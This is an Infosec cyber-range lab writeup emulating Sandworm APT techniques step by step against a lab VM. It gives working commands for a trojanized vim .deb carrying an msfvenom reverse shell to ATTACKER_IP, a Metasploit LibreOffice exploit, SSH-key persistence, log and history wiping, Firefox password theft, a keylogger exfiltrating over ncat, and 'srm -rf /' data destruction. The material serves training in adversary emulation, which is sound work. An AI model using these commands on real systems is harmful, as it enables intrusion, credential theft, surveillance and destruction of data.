Sandworm APT

Range Writeup

Environment
This project consists of a single VM with a container.

Setup
Download the .ova file attached to this project and import it to a virtualization program.
NOTE: The VM for this project requires a VMware virtualizer, it is not compatible with
VirtualBox. VMware Workstation Player is available as a free download from the VMware
website. After loading the VM, log into the user account with the username of “user” and
password of “password”. Run the “start_range.sh” script on the desktop to start the cyber
range. To connect to the container, run the connect_to_machine.sh script. To reset the cyber
range to its initial state, run reset_range.sh.

Introduction
Sandworm APT is an advanced hacking group that has been active since at least 2009. Most
famous for their attacks on Ukrainian electrical companies and the NotPetya attacks in 2016, they
are a Russian-backed threat group.

In this lab we’ll take a look at and emulate some of the techniques that Sandworm has used in the
past to compromise, pivot from, and destroy a server.

Initial Access - Software Supply Chain Compromise

In the 2016 NotPetya attack Sandworm was able to compromise the initial servers using a
malicious software update that was poised as a legitimate one. In this lab we’ll mimic this behavior
by injecting malicious code into an update, allowing us remote code execution when the updated
program is started.

To emulate this we’ll trojanize a popular .deb program and collect a reverse shell when the victim
installs and runs our malicious update. We’ll start by trojanizing the .deb file for vim. To get
started, open a terminal and extract the .deb file that is found in the /root/ directory of the Kali
Linux machine.

mkdir /tmp/work
cd /vim
dpkg -x ~/vim.deb work

© 2020 Infosec 11
With the application extracted we can create a DEBIAN directory which will allow us toadd some
malicious elements to the application. In this new directory we’ll create a postinst file that will run after
installation.

mkdir work/DEBIAN
cd work/DEBIAN
nano control

» Edit the control file so that it contains the following lines.

Package: vim
Version: 8.3
Section: Tools
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: N/A

nano postinst

» Edit the postinst file so that it contains the following lines.

#!/bin/sh
sudo chmod 2755 /usr/share/vim/addons/update && /usr/share/vim/addons/update

chmod 755 postinst

© 2020 Infosec 2
The postinst file we’ve just created will be run after installation. It will execute the file at /usr/share/vim/
addons/update, which we’ll need to create. We can create a reverse shell with msfvenom. Be sure to
swap out “ATTACKER_IP” with your IP, this can be found with the ip a command.

mkdir -p /tmp/work/usr/share/vim/addons
msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp
LHOST=ATTACKER_IP LPORT=443 -b “\x00” -f elf -o /tmp/work/usr/share/vim/
addons/update

With that, when the malicious app is installed a reverse shell should be sent back to us. Let’s package it
back up and host it and get a netcat listener ready.

cd /tmp
dpkg-deb --build /tmp/work
cd
mkdir dist
cd dist
mv /tmp/work.deb ./vim.deb
python3 -m http.server 80

(in a different terminal)

nc -nvlp 443

© 2020 Infosec 3
With the malicious package up, switch over to the victim server and simulate a user installing our
malicious app.

wget http://[ATTACKER_IP]/vim.deb
sudo dpkg -i vim.deb

If everything went according to plan we should now have received a reverse shell back!

Execution & Persistence - Libreoffice Exploit

One of sandworm’s many techniques for exploitation is the exploitation of client-side software such as
office productivity software. In this section, we’ll use Metasploit to create a LibreOffice exploit, share it
with a target, and receive a reverse shell back. Not only does this give an attacker an execution foothold,
but it also provides a form of persistence, as whenever the file is opened again a shell should be sent.

To get started we’ll need to create the malicious file. Start by opening msfconsole
msfconsole

Next, follow the next few commands to generate a malicious LibreOffice file using CVE-2019-9848 and
CVE-2019-9851. Change <ip> to your ip. Your ip address can be found using the ip a command.

use exploit/multi/fileformat/libreoffice_logo_exec
set LHOST <ip>
set LPORT 443
run

© 2020 Infosec 4
We’ll also need to create a metasploit handler so that we can receive the reverse shell back. Enter the
following commands to start a metasploit handler with the correct payload and ip set.

use multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST [YOUR_IP]
set LPORT 443
run

The generated file should have been placed in the /root/.msf4/local/ directory earlier. Navigate to there in
a different terminal window and start up a python webserver so that the victim can receive the malicious
file.

cd /root/.msf4/local/
python3 -m http.server 80

From here we can simulate our victim downloading and opening the malicious file. On the victim
machine, run the following commands.

wget ATTACKER_IP/librefile.odt
export HOME=/tmp && libreoffice6.2 ./librefile.odt
© 2020 Infosec 5
What a lovely little turtle. Go ahead and check the metasploit window on the Kali machine. Provided
everything went smoothly you should have received a reverse shell back!

At this point let’s establish some persistence by adding a ssh public key to the victim server. On the Kali
machine generate ssh keys with the ssh-keygen command. Once this has completed you’ll need to add
the contents of the newly-generated /root/.ssh/id_rsa.pub file to the /home/admin/.ssh/authorized_keys
file on the victim server. If you’ve done this correctly you should now be able to ssh to the victim machine
as admin without knowing the admin user’s password!

© 2020 Infosec 6
© 2020 Infosec 7
Defense Evasion - IOC Removal
Once initial access is gained and persistence is established, markers of exploitation should be removed to
prevent being discovered. Since we can now login directly with ssh, let’s remove the malicious libreoffice
files and vim install files. We’ll use the srm command to make any potential forensics and file recovery of
these files more difficult.

sudo srm /usr/share/vim/addons/update

sudo srm ./librefile.odt

We’ve deleted the files, but bash keeps a history of all commands run. When we log out this history will
be written to the .bash_history file. Let’s make our actions harder to follow by removing this file and
disabling future writing of this history

rm ~/.bash_history
export HISTFILESIZE=0

Now when we log out no record of the commands that have been run will be kept.

Credential Access - Stealing browser passwords:

Sandworm has been known to implement functionality in it’s malware to steal passwords from browsers.
Here we’ll take a look at an open-source tool, firefox-decrypt, to steal more passwords from the machine
we’ve already compromised.

We’ll use firefox-decrypt to extract passwords that are saved in the firefox profiles on this machine. To
get started we’ll need to transfer over firefox-decrypt.py. We can do this using netcat. On the attacker
machine prep a netcat listener.

ncat --ssl -nvlp 443 < firefox_decrypt.py

Next, use netcat on the victim machine to complete the transfer

ncat --ssl -nv [attacker IP] 443 > firefox_decrypt.py

© 2020 Infosec 8
There won’t be a progress indicator, so after a few moments press CTRL+C to end the transfer. Once the
transfer is complete the program can be run with a python firefox_decrpt.py. Enumerate each firefox
profile to find passwords. When prompted for a master password, leave it blank.

© 2020 Infosec 9
Lateral Movement
The credentials and information that we’ve gathered in the previous steps will now allow us to jump to
another server. There is a second server at 172.20.0.3 that is running an ssh server on port 2222. Using
the usernames and passwords that you gathered using firefox_decrypt, log-in to this new server using
ssh.
ssh username@172.20.0.3 -p 2222

Collection, Command & Control, and Exfiltration - Keylogging and returning

information via netcat
One of sandworm’s many tricks is installing keyloggers. Here we will install a key logger on our original
victim server (the one that we can open a VNC session with) and configure it to send any information that
is recovered back to us. Installing this keylogger will require us to use some C2 techniques to move the
tool to the victim machine.

For this lab we can use a small custom python keylogger. Give it a shot on the Kali machine by running it
in with the following command:

python3 ~/tools/keylogger.py

With that running, type whatever you’d like into another window. Everything that you type should be
reflected in the python script’s output. Go ahead and kill the program with CTRL+C once you’ve verified
that it’s working correctly.

© 2020 Infosec 10
Next we’ll transfer the keylogger over to the victim server using the same method that we did before.

On the attacker: ncat --ssl -nvlp 443 < keylogger.py

On the victim: ncat --ssl -nc [ATTACKER_IP] 443 > keylogger.py

Getting keylogging printing out to the screen is one thing, but we’d like to be able to send the output back
out attacker machine. We can do this by piping the output into ncat and redirecting the output of netcat
to a file on the attacker.

On the attacker: ncat --ssl -nvlp 443 > log_output.txt

On the victim: export DISPLAY=:1.0 && python3 ./keylogger.py | ncat --ssl -nv
[ATTACKER_IP] 443

Now we should be able to monitor the output of the keylogger from the attacker machine with tail
-f ./log_output.txt. Test it out by entering some keystrokes into the victim machines from the VNC
session and confirming that you can see them on the attacker machine.

© 2020 Infosec 11
Impact - Data Destruction
Many of Sandworm’s attacks are destructive. Once we’ve taken the data that we want, let’s destroy
the server. A simple sudo srm -rf / will do. The -rf ensure that the srm command acts recursively,
deleting every directory and file on the server. Feel free to wait for the command to exit or to exit early,
congratulations on finishing this lab!

© 2020 Infosec 12